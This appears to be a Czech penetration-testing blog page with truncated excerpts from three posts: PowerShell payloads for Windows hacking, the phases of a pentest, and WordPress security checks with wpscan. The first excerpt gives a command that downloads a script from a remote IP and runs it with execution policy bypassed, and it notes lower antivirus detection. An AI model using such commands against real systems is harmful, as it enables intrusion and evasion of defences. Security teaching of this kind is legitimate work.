PowerShell jednoduché a užitečné payloady Někdy může být výhodné při hackingu v prostředí MS Windows využít powershell. PowerShell je efektivní skriptovací jazyk a jeho použití snižuje pravděpodobnost detekce payloadu antivirem.   Začneme tím nejjednodušším. Otestujeme, jestli je PowerShell k dispozici. PowerShell -Command "Write-Host 'Hello World'"   Při pohybu po cílovém systému nejčastěji potřebujeme stáhnout soubor, otevřít port, připojit reverzní shell, spustit proces. Elegantní stažení souboru můžeme provést pomocí PowerShell Wget. Je to ve skutečnosti alias Invoke-WebRequest. Na některý starších systémech to nemusí fungovat. PowerShell -c wget "http://10.10.33.244:8080/Hello-World.ps1" -outfile "Hello-World.ps1" PowerShell -ExecutionPolicy Bypass -File Hello-World.ps1   Stává se, že potřebujeme soubor stáhnout a hned spustit. Nejprve upravíme náš skript a kód ob...

Penetrační test nebo bezpečnostní audit je autorizovaný simulovaný útok prováděný na domluvený cíl za účelem zhodnocení zabezpečení testovaného systému. Testeři používají postupy, nástroje a techniky podobné těm co používají reální útočníci.  Při testování tester postupuje po krocích, které po sobě následují. Většinou se uvádí 6 fází penetračního testu. Příprava testu (Pre-Engagement Interactions) Průzkum (Reconnaissance and OSINT) Identifikace zranitelnosti (Threat Modeling & Vulnerability Identification) Exploitace (Exploitation) Zpracování nálezu (Post-Exploitation, Risk Analysis & Recommendations) Závěrečná zpráva (Reporting)  1. Příprava testu Souhlas vlastníka systému s testování je podmínkou proto aby test byl legální. Za formální souhlas s tetování se považuje podepsání RoE. V RoE jsou domluveny podmínky za který test proběhne. Návrh RoE zpracovává dodavatel testu.   2. Průzkum Kombinací aktivního skenování a vytěžovaní veřejně dostupných zdrojů tester shr...

CMS Wordpress je velmi oblíbený a rozšířený při tvorbě webu. Je snadno dostupný a lehce ovladatelný. Webové stránky ve Wordpressu často dělají začátečníci, kteří nic nevědí o bezpečnosti. Současné verze Wordpressu jsou celkem dobře zabezpečené, přesto se někdy mohou stát cílem útoku. Nabízíme pár typů a triků jak rychle zkontrolovat úroveň zabezpečení a opravit případné chyby. V případě zájmu vaší instalaci zkontrolujeme, upozorníme vás na chyby a zranitelnosti, navrhneme jak zabezpečení zlepšit. Upozorňujeme, že testovat by jste měli pouze vaše systémy nebo systémy kde máte testy schválené jejich vlastníkem. Testování cizích systému může být považováno za útok.   Na rychlou kontrolu Wordpressu se výborně hodí toolka wpscan . Dostupná je třeba v kali linuxu. Práce s ní je pro zkušenějšího uživatele snadná. Spustíte wpscan s parametrem URL webu a api tokenem. Některé weby mohou být zabezpečené pomocí WAF (Web Application Firewall) a wpscanu se brání. Toto zabezpečení můžete zkusit o...